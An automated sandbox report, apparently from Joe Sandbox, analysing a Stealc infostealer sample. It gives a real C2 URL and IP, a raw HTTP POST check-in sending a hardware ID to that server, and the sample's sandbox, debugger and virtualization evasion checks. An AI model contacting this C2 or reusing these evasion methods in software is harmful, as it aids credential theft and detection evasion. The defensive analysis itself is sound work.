Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1545818
MD5:	e4b956c7c98758b0fedda4156545593d
SHA1:	42debf379a13bf4ea20036bfb780ad49b5e95bd6
SHA256:	7d163fd79c3d69b1b2c9d00c90f9ea3379f94b504bd55192a483f528d6ac52c9
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 716 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E4B956C7C98758B0FEDDA4156545593D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2155893924.0000000000998000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2114793571.0000000004E80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 716	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 716	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.e10000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T04:16:02.780418+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49725	185.215.113.206	80	TCP

Code function: 0_2_00E162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00E162D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: tse1.mm.bing.net

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 45 45 46 36 42 37 39 33 33 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="hwid"CEEF6B7933E23924696330------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build"tale------IEHCAKKJDBKKFHJJDHII--

Source: file.exe, 00000000.00000002.2155893924.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2155893924.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2155893924.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpF
Source: file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpS
Source: file.exe, 00000000.00000002.2155893924.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpc
Source: file.exe, 00000000.00000002.2155893924.00000000009D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2114793571.0000000004EAB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C	0_2_0126316C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E50098	0_2_00E50098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011A51DA	0_2_011A51DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6B198	0_2_00E6B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E42138	0_2_00E42138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0123D0CF	0_2_0123D0CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E54288	0_2_00E54288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7E258	0_2_00E7E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011B4226	0_2_011B4226
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8D39E	0_2_00E8D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012682FF	0_2_012682FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9B308	0_2_00E9B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0123C569	0_2_0123C569
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0127243E	0_2_0127243E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E545A8	0_2_00E545A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7D5A8	0_2_00E7D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E34573	0_2_00E34573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3E544	0_2_00E3E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E996FD	0_2_00E996FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E566C8	0_2_00E566C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0119E796	0_2_0119E796
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8A648	0_2_00E8A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01176608	0_2_01176608
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126167B	0_2_0126167B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E86799	0_2_00E86799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012486AF	0_2_012486AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6D720	0_2_00E6D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7F8D6	0_2_00E7F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6B8A8	0_2_00E6B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E698B8	0_2_00E698B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E64868	0_2_00E64868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012759B6	0_2_012759B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126B9C1	0_2_0126B9C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012369DD	0_2_012369DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011F6B0B	0_2_011F6B0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E78BD9	0_2_00E78BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E84BA8	0_2_00E84BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E80B88	0_2_00E80B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0125FA81	0_2_0125FA81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126DD05	0_2_0126DD05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8AC28	0_2_00E8AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E64DC8	0_2_00E64DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011DCC48	0_2_011DCC48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E65DB9	0_2_00E65DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6BD68	0_2_00E6BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41D78	0_2_00E41D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7AD38	0_2_00E7AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E81EE8	0_2_00E81EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0125DF75	0_2_0125DF75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E58E78	0_2_00E58E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01273E2D	0_2_01273E2D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01269E81	0_2_01269E81

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00E14610 appears 316 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: usisoqoi ZLIB complexity 0.9949866959291486

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00E29790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00E23970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ZBR48792.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

Virustotal: Detection: 43%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2085888 > 1048576

Source: file.exe

Static PE information: Raw size of usisoqoi is bigger than: 0x100000 < 0x192400

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2114793571.0000000004EAB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2114793571.0000000004EAB000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.e10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00E29BB0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x209bb8 should be: 0x20b8de

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: usisoqoi
Source: file.exe	Static PE information: section name: igxiqctn
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012CA12E push edx; mov dword ptr [esp], 57FF0BAAh	0_2_012CA15F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012CA12E push 089A9F00h; mov dword ptr [esp], esi	0_2_012CA1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012CA12E push edx; mov dword ptr [esp], 50F8B4CCh	0_2_012CA1F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3A0F3 push eax; retf	0_2_00E3A119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3A0DC push eax; retf	0_2_00E3A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebx; mov dword ptr [esp], ecx	0_2_012631AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edi; mov dword ptr [esp], edx	0_2_012631D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebx; mov dword ptr [esp], 77EFAB61h	0_2_0126322F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edx; mov dword ptr [esp], edi	0_2_012632A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edi; mov dword ptr [esp], edx	0_2_01263314
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push esi; mov dword ptr [esp], 73BBB330h	0_2_01263319
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ecx; mov dword ptr [esp], 7DEC5D57h	0_2_012633A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebx; mov dword ptr [esp], esi	0_2_012633CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push 41EAF6B5h; mov dword ptr [esp], edx	0_2_01263401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push 2509A44Ch; mov dword ptr [esp], edi	0_2_012634A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ecx; mov dword ptr [esp], 00000000h	0_2_012634AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edi; mov dword ptr [esp], ebx	0_2_012634DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ecx; mov dword ptr [esp], eax	0_2_01263525
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push eax; mov dword ptr [esp], 00000001h	0_2_01263560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push 39C8302Dh; mov dword ptr [esp], edi	0_2_0126356F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebp; mov dword ptr [esp], 44B98EE6h	0_2_01263575
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebx; mov dword ptr [esp], ecx	0_2_01263580
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ebp; mov dword ptr [esp], eax	0_2_01263646
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ecx; mov dword ptr [esp], edi	0_2_012636F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push eax; mov dword ptr [esp], ebp	0_2_01263787
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edi; mov dword ptr [esp], ebx	0_2_012637B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edi; mov dword ptr [esp], ecx	0_2_0126383E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push edx; mov dword ptr [esp], esp	0_2_012638D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push 415C53B3h; mov dword ptr [esp], ecx	0_2_012638F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push 1ABFA674h; mov dword ptr [esp], edx	0_2_01263956
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0126316C push ecx; mov dword ptr [esp], edx	0_2_01263979

Source: file.exe

Static PE information: section name: usisoqoi entropy: 7.953872207980885

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00E29BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-37701

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5AC second address: 127A5CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1DD480848Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DD480848Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12798AB second address: 12798D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DD489F59Ch 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F1DD489F5A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279A82 second address: 1279A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279A88 second address: 1279A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279D1A second address: 1279D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279D1E second address: 1279D55 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 js 00007F1DD489F596h 0x0000000f pop eax 0x00000010 popad 0x00000011 ja 00007F1DD489F5C6h 0x00000017 pushad 0x00000018 jns 00007F1DD489F596h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F1DD489F59Ch 0x00000025 js 00007F1DD489F596h 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279D55 second address: 1279D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279D5B second address: 1279D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C461 second address: 127C467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C467 second address: 127C481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DD489F5A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C481 second address: 127C4CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b stc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F1DD4808488h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 add ecx, dword ptr [ebp+122D1F8Bh] 0x0000002e and ecx, 454CEFAAh 0x00000034 push A4E8F246h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jnl 00007F1DD4808486h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C4CA second address: 127C556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1DD489F5A5h 0x0000000b popad 0x0000000c add dword ptr [esp], 5B170E3Ah 0x00000013 jmp 00007F1DD489F5A6h 0x00000018 push 00000003h 0x0000001a mov dword ptr [ebp+122D284Bh], ebx 0x00000020 xor ecx, dword ptr [ebp+122D2BC2h] 0x00000026 push 00000000h 0x00000028 call 00007F1DD489F59Ch 0x0000002d jl 00007F1DD489F5A0h 0x00000033 jmp 00007F1DD489F59Ah 0x00000038 pop edi 0x00000039 push 00000003h 0x0000003b jmp 00007F1DD489F5A5h 0x00000040 push 7C83B4F1h 0x00000045 jbe 00007F1DD489F5A8h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C556 second address: 127C55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C55A second address: 127C55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127C6FC second address: 127C75E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1DD4808488h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007F1DD4808491h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F1DD4808494h 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e jmp 00007F1DD480848Ah 0x00000023 jg 00007F1DD4808493h 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
